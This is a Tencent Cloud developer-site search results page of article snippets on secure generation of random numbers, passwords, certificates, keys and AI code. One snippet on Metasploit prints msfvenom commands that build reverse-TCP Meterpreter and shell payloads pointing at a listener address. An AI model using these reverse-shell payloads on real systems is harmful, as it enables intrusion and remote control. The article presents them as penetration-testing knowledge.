- 综合排序
- 最热优先
- 最新优先
- 来自专栏JAVA乐园
生成安全的随机数
每一个线程有一个独立的随机数生成器 0x02:Math.random() Math.random()产生的随机数是在0 到1之间的一个double类型的随机数,即 0 <= random <= 1 例子 从源码分析发现,调用Math.random()方法时,自动创建了一个伪随机数生成器,实际上用的是new java.util.Random()。 在注重信息安全的应用中,不要使用 LCG 算法生成随机数,请使用 java.security.SecureRandom。 SecureRandom 提供加密的强随机数生成器(This class provides a cryptographically strong random number generator [RNG 每一个线程有一个独立的随机数生成器,用于并发产生随机数,能够解决多个线程发生的竞争争夺,效率更高。
3.1K10发布于 2020-06-12 - 来自专栏betasec
安全攻防 | MSF生成Payload方式总结
声明:本人坚决反对利用文章内容进行恶意攻击行为,一切错误行为必将受到惩罚,绿色网络需要靠我们共同维护,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全。 1 Payload生成方式 (1)windows msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -a x86 --platform osx -f c 2 反弹shell生成方式
1.1K20编辑于 2023-02-25 - 来自专栏玩转全栈
GitHub Copilot 生成代码有安全漏洞
现代代码生成工具利用大型语言模型(LLMs)生成完整的代码,但使用这些工具存在安全挑战。研究人员对代码生成工具的安全性进行了探讨,尤其是GitHub Copilot生成的代码的安全性。 研究结果强调开发人员在使用Copilot和类似AI代码生成工具时需谨慎,建议进行安全检查,以确保生成的代码安全性。 研究为开发者提供了有价值的信息,可以帮助他们明确 Copilot 生成代码中可能存在的安全风险类型、风险程度及解决思路。这将提高开发者对 Copilot 等新兴代码生成工具的安全防范能力。 本研究表明仅依靠 Copilot 生成代码存在一定安全风险,开发者仍需自己审查代码、进行安全检查,不能完全依赖工具。代码生成工具可以提高效率,但不能替代开发者对代码质量和安全性的把控。 研究证明仅依靠Copilot生成代码存在安全隐患,开发者仍需自己负责代码检查和安全防范,建议接入静态代码扫描。
1.2K40编辑于 2023-10-05 - 来自专栏用ChatGPT做软件测试
使用 ChatGPT 辅助安全测试脚本生成
它不仅可以理解安全需求、自动生成测试脚本,还能协助分析漏洞信息、构造攻击载荷、输出测试报告,帮助测试人员实现从“手动安全测试”到“智能化安全测试”的飞跃。 本文将围绕“如何使用 ChatGPT 辅助安全测试脚本生成”这一主题,从原理机制、实战流程、脚本案例、安全边界和未来展望等角度深入剖析,助力企业和技术人员构建更强大的安全测试体系。 一、为什么选择 ChatGPT 辅助生成安全测试脚本? 二、ChatGPT 辅助生成安全测试脚本的典型场景2.1 Web 安全测试脚本生成示例:SQL 注入测试脚本生成提示词(Prompt): 我正在测试一个 PHP Web 表单的 SQL 注入漏洞,表单包含用户名和密码字段 本文不仅介绍了使用 ChatGPT 生成安全测试脚本的实战方法,还指出了其安全边界与未来演进路径。安全测试的智能化,是 DevSecOps 持续演进的关键一步。
39510编辑于 2025-07-12 - 来自专栏FreeBuf
Prithvi:一款针对安全审计活动的安全报告生成工具
关于Prithvi Prithvi是一款针对安全审计活动的安全报告生成工具,该工具专为安全审计活动设计,可以帮助广大研究人员以自动化的形式申城安全审计报告。 功能介绍 该工具的使用非常简单,它可以给广大研究人员提供下列功能: 1、支持添加OWASP类型以及详细建议; 2、支持添加多个项目并单独进行处理; 3、支持通过概念验证在不同项目上添加多个安全漏洞 ; 4、在生成安全审计报告时,支持生成.docx文档格式; 5、目前,开发人员正在尝试添加更多的功能,例如Chart等; 系统要求 1、支持的操作系统:macOS 64位、Windows
2.4K20编辑于 2023-03-29 - 来自专栏linux运维
安全审计报告问题:安全审计报告生成失败,无法分析
检查报告生成工具首先确认使用的报告生成工具是否正确安装并运行。 调整报告生成命令根据工具的不同,使用正确的命令生成报告。 检查权限问题确保当前用户有权限访问日志文件和生成报告。 测试报告生成流程在测试环境中模拟报告生成,确保流程无误。 自动化生成:将报告生成脚本加入定时任务,定期生成报告。
63910编辑于 2025-02-09 - 来自专栏开源小分队
安全在线简历生成器,不试试吗?
又到了换工作的季节,小妹找到一款开源的在线简历生成器,用它写了份简历。 我们都知道简历的核心还是在于内容,这款简历模板开源项目,简单、模板精致、安全、选择不困难~~ 简介 在线简历生成器,使用简单,无需链接远程服务,不用担心简历信息泄露。 user=visiky&branch=master 小结 怎么样是不是使用简单,安全有效,没有选择困难。另外大家如果有求职面试的需求,可以结合我们前面聊过的怎么写简历的开源项目,简直是绝配。
2K10编辑于 2022-12-07 - 来自专栏DotNet NB && CloudNative
Sqids 在 .NET 中生成安全短 ID
适用于生成用户可见的 ID(如 URL 中的 ID),确保这些 ID 不包含敏感或不适当的内容,并提供高性能和灵活性。 有点类似之前介绍的 · Hashids· 生成的短链 使用Hashids来保护你的Dotnet应用程序 功能特性 • 无冲突(Collision-free): 生成的 ID 是唯一的,并能解码回原始数字 • “眼安全”(Eye-safe): 避免常见脏话、敏感词,适合用户可见场景。 • 随机化输出(Randomized Output): 相同输入序列会生成不同 ID,防止猜测。 在控制器中注入: public class SomeController(SqidsEncoder<int> sqids) { // ... } 总结 Sqids 提供了一种简洁、高效的方式来生成安全
21600编辑于 2025-06-28 - 来自专栏学习java的小白
java 生成本地ssl安全证书 springboot配置
Springboot配置使用ssl,使用https SSL(Secure Sockets Layer 安全套接层)是为网络通信提供安全及数据完整性的一种安全协议,SSL在网络传输层对网络连接进行加密,SSL 协议位于TCP/IP协议与各种应用层协议之间,为数据通信提供安全支持。 1.生成证书,可以使自签名或者从SSL证书授权中心获得的。 JDK中keytool是一个证书管理工具,可以生成自签名证书。 本人这里用的系统是deepin,然后生成命令如下(找不到keytoo命令的先去配置java环境) 我指定的名字叫tomcat.keystore 别名叫tomcat,密码自己设置,我这里用的tomcat ,最后那个直接按得回车 /home/gzr/是生成证书保存路径 tomcat.keystore生成证书的名字和后缀 keytool -genkey -alias tomcat -keyalg RSA -
3.1K11发布于 2020-12-07 - 来自专栏全栈工程师修炼之路
PS命令之账户安全票据生成管理
描述: 在安全操作中使用该凭证对象; 语法参数: Get-Credential [[-Credential] <PSCredential>] [<CommonParameters>] Get-Credential 该命令将生成的凭据保存在$Credential变量中。 # 使用PromptForCredential时,可以指定提示中显示的标题、消息和用户名。 此方法需要纯文本密码(这可能违反某些企业的安全标准-通常不建议)。 $PWord # 5.此命令使用Get-Credential cmdlet的消息和用户名参数 $cred = Get-Credential -User WeiyiGeek -Message "请输入安全认证密码
89720编辑于 2022-09-29 生成式AI安全防护最佳实践指南
像专家一样构建安全的生成式AI应用:某机构服务防护机制最佳实践在将生成式AI应用部署到生产环境时,许多组织都面临着在安全性与准确性、性能和成本之间寻求平衡的挑战。 图像内容过滤:除了文本,内容过滤器还可应用于图像,将相同的内容审核策略同时应用于生成式AI应用中的文本和图像。 提示词攻击预防:有助于识别可能试图削弱安全功能和开发者指令的“越狱”尝试、提示词注入攻击和提示词泄露攻击。建议启用此策略以维护应用安全。 模型生成响应后,系统会在结果返回给用户前再次通过防护机制评估输出(包括适用的依据来源)。这些原生集成简化了实施,同时保持了全面的保护。 遵循这些经过实战检验的实践,将有助于确保生成式AI应用保持安全、高性能,并准备好自信地扩展到生产环境。FINISHED
28810编辑于 2026-03-08生成式AI安全大赛加速可信软件开发
Amazon Nova AI Challenge加速生成式AI领域发展首届全球大学竞赛聚焦于推进安全、可信的AI辅助软件开发。在某中心,负责任的AI开发包括与顶尖大学合作以促进突破性研究。 虽然Amazon Nova AI挑战赛将探索生成式AI(Gen AI)的各个方面,但今年的挑战赛以“可信AI:推进安全的AI辅助软件开发,以构建更安全、更可靠的应用程序”为中心。 所有队伍都将发表研究论文,详细阐述其方法和发现,最终目标是提升用户体验、防止滥用,并实现AI在软件开发中更安全的应用。挑战赛的进展将为代码生成及更广泛领域的负责任AI开发做出贡献。 这一举措超越了理论研究——它是关于开发识别安全漏洞和防范威胁的新方法,这些方法可以直接应用于生成式AI编码助手。我迫不及待地想看到学生们发明什么,并分享他们的研究。” 挑战赛本质上是跨学科的——位于负责任AI、生成式AI、安全、对话式AI和自动化软件开发的交叉点。因此,它汇集了在多个研究领域具有专业知识的团队,为竞赛带来了不同的才能和视角。
11010编辑于 2026-01-21- 来自专栏测试开发囤货
Python中生成器的线程安全与优化
Python中生成器的线程安全与优化 在自动化测试多线程编程中,确保数据结构的线程安全性是至关重要的。本文将讨论如何在 Python 中处理生成器和迭代器的线程安全问题,并提供一些优化的思路。 1.2 threadsafe_generator 装饰器 装饰器 threadsafe_generator 负责将生成器包装在 ThreadSafeIter 类中,使其线程安全。 测试 为了测试优化后的代码,我们创建了一个简单的多线程测试场景,模拟了多个线程同时访问线程安全的生成器。测试中包含了模拟耗时操作,以更真实地反映实际应用中的情况。 test_threadsafe_generator 函数创建多个线程,并在这些线程中同时访问线程安全的生成器,通过观察输出和比较运行时间。 5. 结论 通过对生成器线程安全性的优化,我们尝试解决了现有代码中的潜在问题,并提高了在多线程环境中的性能表现。然而,优化的效果取决于具体的使用场景,因此在实际应用中,建议进行更全面的测试和性能评估。
59310编辑于 2023-11-28 - 来自专栏程序那些事
更加安全的密钥生成方法Diffie-Hellman
之前我们谈到了密钥配送的问题,这个世界是如此的危险, 一不小心通信线路就会被监听,那么我们怎么在这种不安全的线路中传递密钥呢? 这里我们介绍一下Diffie-Hellman密钥交换算法。 生成两个共享的质数 G 和P,并将这两个数在x和y中共享。 P是一个非常大的质数,而G是P的生成元(生成元的乘方结果和1~P-1中的数字是一一对应的)。 这两个数G和P不需要保密。被窃取也没关系。 2. x生成一个随机数A,这个随机数只能x知道。 A是一个1~P-2中的一个整数。 3. y生成一个随机数B,这个随机数只能y知道。 B是一个1~P-2中的一个整数。 接下来,我们探讨下Diffie-Hellman算法的安全性: 在该算法中,暴露在外部的变量是P,G,GA mod P和GB mod P 这4个变量。 根据这四个变量来生成最终的GA*B mod P是非常困难的。 这个问题涉及到了离散对数问题,要解决是非常困难的。 所以,我们可以相信Diffie-Hellman算法是非常安全的。
1.4K40发布于 2020-07-08 - 来自专栏Java学习网
打造自己的密码生成器:Java中如何生成安全且随机的密码?
生成安全且随机的密码是非常重要的,可以通过Java中提供的一些功能和库来实现。下面将提供一种方法来构建一个安全且随机的密码生成器,并解释其中的关键概念和步骤。 1、密码要求: 在构建密码生成器之前,首先需要确定密码的要求。一个安全的密码通常应包含以下特点: 1)、长度足够:密码长度最好为8个字符以上,更长的密码更为安全。 5、验证密码的安全性: 生成密码后,可以进行一些简单的验证以确保生成的密码满足密码要求。例如,可以检查密码的长度、字符类型和是否包含常见密码等。 关键步骤包括定义密码要求、使用SecureRandom类生成随机数、定义密码字符集、生成密码以及验证密码的安全性。 生成安全密码是保护个人和敏感信息的重要措施,强烈建议根据实际需求生成复杂、随机的密码,并定期更改密码以提高安全性。
2.3K10编辑于 2024-05-10 AI秒级生成安全控制伪代码技术解析
AI秒级生成安全控制伪代码技术解析背景介绍某中心帮助客户维护云环境安全的重要服务之一是安全中心,该服务聚合、组织和优先处理来自某中心服务和第三方工具的安全警报。 平均而言,生成单个安全控制需要24天时间。随着某中心继续扩展其服务组合,每个服务包含众多需要保护的资源,此过程的复杂性将会增加,手动编写和审查控制会导致部署延迟。 生成式AI解决方案新模型使用大语言模型自动生成Gherkin规范,将所需时间从数天缩短到仅需几秒钟。当输入模型服务文档和安全需求描述时,大语言模型可以输出准确的控制规范,随时可供实施。 Gherkin生成框架例如,大语言模型可以为基本安全需求(如静态数据加密或日志记录)生成Gherkin规范。 通过结合这些技术,新模型能够提供高度准确和领域特定的安全控制,这应显著加快开发过程并提高整体安全效率。在未来的工作中,将进一步完善系统,可能使用基于代理的架构来处理更复杂的控制生成场景。
9710编辑于 2025-11-04大语言模型秒级生成安全控制伪代码
云安全控制规则的AI自动化生成某中心网络服务(AWS)通过安全中心聚合各类安全警报,这些警报基于安全控制规则——用于确保服务配置符合安全最佳实践的规范。 传统安全控制开发需分析文档、编写Gherkin规范并最终编码实现,单个规则平均耗时24天。在CIKM 2024企业级生成式AI研讨会上展示的新模型,利用大语言模型(LLM)实现安全控制自动化生成。 该系统具有以下技术特性:Gherkin规范自动生成框架输入服务文档和安全需求描述LLM直接输出可立即实施的规范支持数据加密、日志记录等基础安全需求领域专用AI技术组合思维链推理:将复杂任务分解为多步流程检索增强生成 (RAG):集成Boto3 API规范作为外部知识源上下文学习:植入安全工程师编写的优质样本性能提升生成时间从数天缩短至秒级支持Amazon SageMaker AutoML等服务的安全配置未来将探索基于代理的架构处理更复杂场景该技术显著加速了云安全控制规则的开发周期 研究团队表示将进一步优化系统,包括采用智能体架构处理更复杂的控制生成场景。
13700编辑于 2025-08-15大模型的安全挑战:如何防止AI生成有害内容?
大模型的安全挑战:如何防止AI生成有害内容?引言随着生成式人工智能(GAI)大模型的迅速发展,其在多个领域的应用展现出了强大的潜力。 然而,这些模型也带来了严重的安全性和伦理问题,尤其是在有害内容生成方面。本文将深入探讨大模型的安全挑战,并提供防止AI生成有害内容的策略和代码实例。 虚假内容生成模型可能生成有害、违法或不道德的内容,如仇恨言论、暴力血腥画面等。此外,模型的生成能力还可能被滥用于制造假新闻以及深度伪造等,对社会安全稳定构成威胁。 else: print("文本安全。")可控生成技术通过在模型的生成过程中施加额外的约束条件,使其生成内容符合特定要求。 通过结合关键词过滤、内容分类器、可控生成技术和Circuit Breakers项目等方法,可以有效地防止AI生成有害内容,确保模型的安全性和可靠性。
1.2K10编辑于 2025-04-07- 来自专栏程序猿DD
ChatGPT 生成的代码比你写的更不安全
不过加拿大魁北克大学的研究人员发现,ChatGPT 生成的代码往往存在严重的安全问题,而且它不会主动告知用户存在这些问题。只有在用户提问生成的代码是否安全时才会进行回答。 ,分析了 ChatGPT 生成的代码的安全性。他们表示结果让人倍感担忧,因为 ChatGPT 生成的部分代码没有达到最低安全标志。 而且 ChatGPT 即便知道自己生成的代码不安全,也不会主动告知用户,除非用户向它询问。 结果显示,ChatGPT 在第一次尝试时生成的 21 个程序中只有 5 个是安全的。 他们举了一个 Java 反序列化漏洞的例子,“聊天机器人生成了有漏洞的代码,并提供了如何使其更安全的建议,但却说它无法生成更安全版本的代码。”
83440编辑于 2023-05-04 生成式人工智能(大语言模型)安全评估要点
大模型的评估维度涵盖了模型的多方面,数据安全它关系到我们每个人的隐私和权益不容忽视,在此,我整理了一些关于大模型“安全评估”的一些要点,希望能够帮助到正在备案的友友们! #生成式人工智能##大模型##安全评估##aigc##备案##大模型备案#一、语料安全评估(一)评估内容1.文本训练语料规模2.各类型语料规模3.训练语料来源4.语料标注数量5.标注人员情况6.标注规则 7.标注内容准确性核验8.语料合法性二、模型安全评估1.语料内容评估2.生成内容评估3.涉知识产权、商业秘密的评估4.涉民族、信仰、性别等评估5.涉透明性、准确性、可靠性等的评估三、安全措施评估1.模型适用人群
54310编辑于 2025-08-19
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号